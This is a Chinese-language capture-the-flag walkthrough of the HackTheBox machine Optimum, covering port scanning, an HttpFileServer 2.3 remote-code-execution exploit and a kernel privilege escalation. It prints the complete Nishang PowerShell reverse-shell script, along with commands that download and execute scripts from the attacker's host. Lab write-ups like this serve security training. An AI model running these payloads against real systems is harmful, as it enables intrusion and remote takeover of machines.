渗透测试靶机练习No.124 HTB:Optimum(OSCP Prep)

靶机信息

靶机地址:

https://app.hackthebox.com/machines/Optimum

靶场: HackTheBox.com

靶机名称:Optimum

难度: 简单

提示信息:

无

目标: user.txt和root.txt

实验环境

攻击机:Kali 10.10.16.3

靶机:10.10.10.8

信息收集

扫描端口

扫描靶机开放的服务端口

sudo masscan -p1-65535 -e tun0  10.10.10.8

sudo nmap -sC -sV -p 80 10.10.10.8 -oN nmap.log

从扫描结果中看到只开放了80端口，中间件为HttpFileServer httpd 2.3。

Web渗透

访问80端口

在页面左下角发现与nmap扫描结果相同的HttpFileServer 2.3程序版本，查找是否存地你们

发现RCE（远程代码/命令执行）漏洞，

exp代码很简单，将其复制下来保存到py文件中并验证exp

vim HttpFileServer-2.3-exp.py

反弹shell脚本rev.ps1(这个脚本忘记在哪下载来的，直接上代码。注意最后一行修改为IP和端口)

function Invoke-PowerShellTcp 

{ 

<#

.SYNOPSIS

Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. 



.DESCRIPTION

This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. 

Also, a standard netcat can connect to this script Bind to a specific port.



The script is derived from Powerfun written by Ben Turner & Dave Hardy



.PARAMETER IPAddress

The IP address to connect to when using the -Reverse switch.



.PARAMETER Port

The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.



.EXAMPLE

PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444



Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on 

the given IP and port. 



.EXAMPLE

PS > Invoke-PowerShellTcp -Bind -Port 80



Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. 



.EXAMPLE

PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444



Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be

listening on the given IP and port. 



.LINK

http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

https://github.com/nettitude/powershell/blob/master/powerfun.ps1

https://github.com/samratashok/nishang

#>      

    [CmdletBinding(DefaultParameterSetName="reverse")] Param(



        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]

        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]

        [String]

        $IPAddress,



        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]

        [Int]

        $Port,



        [Parameter(ParameterSetName="reverse")]

        [Switch]

        $Reverse,



        [Parameter(ParameterSetName="bind")]

        [Switch]

        $Bind



    )



    

    try 

    {

        #Connect back if the reverse switch is used.

        if ($Reverse)

        {

            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)

        }



        #Bind to the provided port if Bind switch is used.

        if ($Bind)

        {

            $listener = [System.Net.Sockets.TcpListener]$Port

            $listener.start()    

            $client = $listener.AcceptTcpClient()

        } 



        $stream = $client.GetStream()

        [byte[]]$bytes = 0..65535|%{0}



        #Send back current username and computername

        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")

        $stream.Write($sendbytes,0,$sendbytes.Length)



        #Show an interactive PowerShell prompt

        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')

        $stream.Write($sendbytes,0,$sendbytes.Length)



        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)

        {

            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding

            $data = $EncodedText.GetString($bytes,0, $i)

            try

            {

                #Execute the command on the target.

                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

            }

            catch

            {

                Write-Warning "Something went wrong with execution of command on the target." 

                Write-Error $_

            }

            $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '

            $x = ($error[0] | Out-String)

            $error.clear()

            $sendback2 = $sendback2 + $x



            #Return the results

            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)

            $stream.Write($sendbyte,0,$sendbyte.Length)

            $stream.Flush()  

        }

        $client.Close()

        if ($listener)

        {

            $listener.Stop()

        }

    }

    catch

    {

        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 

        Write-Error $_

    }

}

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -Port 4444

攻击机上在反弹脚本目录下开启HTTP服务

py3 -m http.server

攻击机监听4444端口

nc -lnvp 4444

执行exp将rev.ps1上传到攻击机并加载

py3 HttpFileServer-2.3-exp.py 10.10.10.8 80 "c:windowsSysNativeWindowsPowershellv1.0powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3:8000/rev.ps1')"

反弹成功，来找找敏感信息

ls
type user.txt.txt

在当前用户桌面上发现flag，继续搜集敏感信息

systeminfo

发现靶机安装了31个补丁，到在线网站上对比下

https://i.hacking8.com/tiquan

结果在网页下方显示

验证这个exp

https://github.com/Ascotbe/Kernelhub/blob/master/CVE-2016-7255/CVE-2016-7255.ps1

IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3:8000/CVE-2016-7255.ps1')

运行结果，检查权限

whoami

提权成功，找找flag

cd c:usersadministratordesktop
type root.txt

拿到root.txt，游戏结束

原文始发于微信公众号（伏波路上学安全）：渗透测试靶机练习No.124 HTB:Optimum(OSCP Prep)